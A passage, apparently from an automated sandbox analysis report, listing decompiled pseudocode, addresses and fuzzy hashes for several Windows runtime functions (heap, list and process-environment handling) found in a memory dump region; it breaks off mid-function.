0x01a1b3a5
0x01a1b3aa
0x01a1b3b2
0x01a1b3ba
0x01a1b3bd
0x01a1b3c0
0x01a1b3c4
0x01a1b3c9
0x01a5a3e9
0x01a5a3ed
0x01a5a3f0
0x01a5a3ff
0x01a5a403
0x01a5a409
0x00000000
0x00000000
0x01a5a40b
0x01a5a40b
0x01a5a40f
0x01a5a415
0x01a5a423
0x01a5a423
0x01a5a415
0x01a1b3d1
0x01a1b3e8
0x01a1b3e8
0x01a1b3d9

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f444a1207e07b1d49b0a76d4e0f661cae14e7601d86ebc2db38ffa6e23330c48
Instruction ID: 6e3ab714ac6d8b87d78440721250561c1f7ae113a70204342d6003f86286329d
Opcode Fuzzy Hash: f444a1207e07b1d49b0a76d4e0f661cae14e7601d86ebc2db38ffa6e23330c48
Instruction Fuzzy Hash: D6116B373051109BCB199B599E81A2B7376EBC5770B290129DD16C7781D935AC12C690

Uniqueness

Uniqueness Score: -1.00%

Function 019E9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E019E9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x1abf708);
				E01A3D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E01A295D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E01A295D0();
				_t33 =  *0x1ad84c4; // 0x0
				L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x1ad84c4; // 0x0
				L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x1ad84c4; // 0x0
				E01A02280(L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1ad86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E01A295D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E01A295D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E019E9325();
					_t50 =  *0x1ad84c4; // 0x0
					return E01A3D0D1(L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x019e9240
0x019e9242
0x019e9247
0x019e924c
0x019e924e
0x019e9255
0x019e9257
0x019e925a
0x019e925f
0x019e925f
0x019e9266
0x019e9271
0x019e9276
0x019e9279
0x019e927e
0x019e9295
0x019e929a
0x019e92b1
0x019e92b6
0x019e92d7
0x019e92dc
0x019e92e0
0x019e92e6
0x019e92e8
0x019e92ee
0x019e9332
0x019e9333
0x019e9337
0x019e9338
0x019e933a
0x019e933a
0x019e933d
0x019e9342
0x019e9342
0x019e9345
0x019e9349
0x019e934e
0x019e9352
0x019e9357
0x019e92f4
0x019e92f4
0x019e92f6
0x019e92f9
0x019e9300
0x019e9306
0x019e9324
0x019e9324

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 625215626b5ec1a041575f894838be07e8ebb5f15d368c7d5cb17ae01a6feee1
Instruction ID: 3f34cfb173e7dabb4b683b0d9e364f66803a60ca3e10ba427ea76f1e440f3106
Opcode Fuzzy Hash: 625215626b5ec1a041575f894838be07e8ebb5f15d368c7d5cb17ae01a6feee1
Instruction Fuzzy Hash: CC214971141A02EFC722EF68CA44F5AB7F9FF28718F14456CE04A976A2CB38E951CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01A74257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01A74257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x1ac08d0);
				E01A3D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E01A741E8(__ebx, __edi, __ecx, _t39);
				E019FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x1ad87e4;
					_t18 =  *0x1ad87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1ad5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x1ad87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x1ad87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L019E7055(_t31 + 0xfffffff8);
								_t24 =  *0x1ad87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x1ad87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1ad5cd0;
				if( *0x1ad5cd0 <= 0) {
					L019E7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x1ad87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x1ad87e8 = _t30;
						 *0x1ad87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E01A3D0D1(L01A74320());
			}

0x01a74257
0x01a74257
0x01a74257
0x01a74259
0x01a7425e
0x01a74263
0x01a74265
0x01a74273
0x01a74278
0x01a7427c
0x01a7427f
0x01a74281
0x01a74287
0x01a742d7
0x01a742d7
0x01a742da
0x01a7428d
0x01a7428d
0x01a7428f
0x01a74292
0x01a74297
0x01a7429c
0x01a742a0
0x01a742a6
0x01a742a8
0x01a742ae
0x01a742b3
0x00000000
0x01a742ba
0x01a742ba
0x01a742bf
0x01a742c5
0x01a742ca
0x01a742cf
0x01a742d0
0x00000000
0x01a742d0
0x01a742b3
0x00000000
0x01a742a6
0x01a7429c
0x01a742dc
0x01a742dc
0x01a742e3
0x01a74309
0x01a742e5
0x01a742e5
0x01a742e8
0x01a742ee
0x01a742f0
0x00000000
0x01a742f2
0x01a742f2
0x01a742f4
0x01a742f7
0x01a742f9
0x01a74300
0x01a74300
0x01a742f0
0x01a7430e
0x01a7431f

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3690b61f3ac341f13216b93a57feb08dd7a446bd5bace135150c57ee9bee53db
Instruction ID: 52172f30d33de078d70629cf01b8b3f253dc72ef9f04cd8db648412d07a913db
Opcode Fuzzy Hash: 3690b61f3ac341f13216b93a57feb08dd7a446bd5bace135150c57ee9bee53db
Instruction Fuzzy Hash: B021A278602F02CFC726EF68D900A14BBF1FB89315F55826ED11A8B265D735D662CF81

Uniqueness

Uniqueness Score: -1.00%

Function 01A12397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E01A12397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x1ad848c != 0) {
					L01A0FAD0(0x1ad8610);
					if( *0x1ad848c == 0) {
						E01A0FA00(0x1ad8610, _t19, _t27, 0x1ad8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01A12581(0x1ad8610, 0x19c50a0, _t26, _t27, _t28);
						E01A0FA00(0x1ad8610, 0x19c50a0, _t27, 0x1ad8610);
					}
				} else {
					L1:
					_t11 =  *0x1ad8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01A24886(0x19c1088, 1, 0x1ad8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01A12581(0x1ad8610, (_t11 << 4) + 0x19c5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x01a123b0
0x01a123b6
0x01a12409
0x01a12415
0x01a55ae9
0x00000000
0x01a1241b
0x01a1241b
0x01a1241d
0x01a12427
0x01a1242e
0x01a12430
0x01a12430
0x01a123b8
0x01a123b8
0x01a123b8
0x01a123bf
0x01a123fc
0x01a123fc
0x01a123c1
0x01a123c3
0x01a123d0
0x01a123d8
0x01a123d8
0x01a123dc
0x01a123de
0x01a123e1
0x01a123e1
0x01a123ec

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34f25478304e7907b06dbe244c58fb9a0c99ffc2867f1ec42bd00325a88c9221
Instruction ID: 7f20706d6dea6b5bb8270a8661e52ec374ff85b0df53cac20528dc1c3d02e16c
Opcode Fuzzy Hash: 34f25478304e7907b06dbe244c58fb9a0c99ffc2867f1ec42bd00325a88c9221
Instruction Fuzzy Hash: 4F1149717047116BF331A73EAD80F15B6E8FBA0B60F28402BF607E7299C6B8E8418754

Uniqueness

Uniqueness Score: -1.00%

Function 01A646A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01A646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E01A2F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E01A1D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L01A077F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x01a646b7
0x01a646ba
0x01a646c5
0x01a646c8
0x01a646d0
0x01a646d4
0x01a646e6
0x01a646e9
0x01a646f4
0x01a646ff
0x01a64705
0x01a64706
0x01a6470c
0x01a64713
0x01a6471b
0x01a64723
0x01a64725
0x01a646d6
0x01a646d9
0x01a646db
0x01a646db
0x01a64732

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 56151e3f18ec5ce9d045bd3a0f80ff082934036aab5ef80fb30e683051cfa1e0
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 4411E572504208BFC7069F5CE9808BEB7B9EF99310F10806AF984C7351DA359D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 019EC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E019EC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x1add360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E019FEEF0(0x1ad70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E01A6F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E019FEB70(_t29, 0x1ad70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E01A2B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E01A6F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x1ad70c0; // 0x0
					while(_t38 != 0x1ad70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x1adb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x019ec96a
0x019ec974
0x019ec988
0x019ec98a
0x01a57c9d
0x01a57c9f
0x01a57ca4
0x01a57cae
0x01a57cf0
0x01a57cf5
0x01a57cfa
0x019ec992
0x019ec996
0x019ec997
0x019ec998
0x019ec9a3
0x019ec9a3
0x01a57cb0
0x01a57cb7
0x01a57cbb
0x00000000
0x00000000
0x01a57cbd
0x01a57ce8
0x01a57cc5
0x01a57cc8
0x01a57cca
0x01a57cd0
0x01a57cd6
0x01a57cde
0x01a57ce4
0x01a57ce4
0x01a57cd0
0x00000000
0x01a57ce8
0x019ec990
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebcdf1d58945a2b7f699e09731f47f95fcd05e32f3b606bb7b0cafac606b4cbc
Instruction ID: 3582ace562a5cbe36ef7dfc04b6dc62592e05f24f6f83c265db56651f87dd02b
Opcode Fuzzy Hash: ebcdf1d58945a2b7f699e09731f47f95fcd05e32f3b606bb7b0cafac606b4cbc
Instruction Fuzzy Hash: BA11E135304A46ABC765AFADDC85A2BB7F5BB84624B80052CFD4693691DB30ED10C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 01A237F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E01A237F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01A02280(_t6, 0x1ad8550);
				}
				_t29 = E01A2387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E019FFFB0(0x1ad8550, _t27, 0x1ad8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x01a237fa
0x01a237fc
0x01a23805
0x01a23808
0x01a23808
0x01a23814
0x01a23818
0x01a23846
0x01a23848
0x01a2384b
0x01a2384b
0x01a23852
0x00000000
0x01a23854
0x01a23856
0x00000000
0x00000000
0x01a23863
0x00000000
0x01a23863
0x01a2381a
0x01a2381a
0x01a2381f
0x01a2386e
0x01a2386e
0x01a23871
0x01a23873
0x01a23873
0x01a23868
0x00000000
0x01a23868
0x01a23821
0x01a23826
0x00000000
0x00000000
0x01a23828
0x01a2382a
0x01a23841
0x00000000
0x01a23841

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3acf9c3a413ac816880000162c168b2d06a239610b2e3f807475a09eeb422f
Instruction ID: 4df2d06f156e54da984ac684bfc640dede4b80d5cf261a7337060d7cc605f73f
Opcode Fuzzy Hash: 3f3acf9c3a413ac816880000162c168b2d06a239610b2e3f807475a09eeb422f
Instruction Fuzzy Hash: 5901D6729026319BCB378B5E9A40E26BBA6FF8BB50B15406DE9498F315D778D801CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01A1002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01A07D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01A07D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01A07D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01A07D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01a10032
0x01a10037
0x01a10043
0x01a54b3a
0x01a10049
0x01a10049
0x01a10049
0x01a1004e
0x01a10053
0x01a54b48
0x01a54b5a
0x01a54b4a
0x01a54b53
0x01a54b53
0x01a54b5f
0x00000000
0x01a54b61
0x00000000
0x01a54b61
0x01a10059
0x01a10059
0x01a10060
0x01a54b6f
0x01a54b6f
0x01a10069
0x01a54b83
0x00000000
0x00000000
0x01a54b90
0x01a54b9b
0x01a54b9b
0x01a54ba4
0x00000000
0x00000000
0x01a54baa
0x00000000
0x01a1006f
0x01a1006f
0x00000000
0x01a1006f
0x01a10069

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 77ccee59d765d9aa39ea0c87318e56ff25184cdcc76b424b4d1bc78fe5c4a89b
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: FA11C4726096818FE763976CDA44B357BE5EF49764F0E00A0ED4487692F738D8C1C660

Uniqueness

Uniqueness Score: -1.00%

Function 019F766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E019F766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E01A1F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E01A1F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01A04620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x019f7672
0x019f767f
0x019f7689
0x019f76de
0x019f76de
0x019f768b
0x019f7691
0x019f7693
0x019f7697
0x00000000
0x019f7699
0x019f76a8
0x00000000
0x019f76aa
0x019f76ad
0x019f76b1
0x00000000
0x019f76b3
0x019f76b3
0x019f76b5
0x019f76ba
0x019f76bc
0x019f76bc
0x019f76c0
0x00000000
0x019f76c2
0x019f76ce
0x019f76ce
0x019f76c0
0x019f76b1
0x019f76a8
0x019f7697
0x019f76d9

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 854f94f0004f595f5826907ad24abee81f3ccd9e36bd4aba464925cb4f41d4ad
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 52018432701119BFD725DE9ECD41E5BBBADFB84660F280528BB1CCB294DA30DD0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E019E9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x1ad85ec;
				E01A02280(_t48, 0x1ad85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E019FFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x1ad538c; // 0x77f06828
					if( *_t84 != 0x1ad5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x1abf6e8);
						E01A3D0E8(0x1ad85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E01AB88F5(_t80, _t85, 0x1ad5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x1ad86c0; // 0x14c07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x1ad86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01A02280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E01AB88F5(0x1ad85ec, _t85, 0x1ad5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E01A2AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x1adb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x1ad84c0;
																			if(_t82 >=  *0x1ad84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01AB9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E019E922A(_t99);
										_t64 = E01A07D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01AB8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
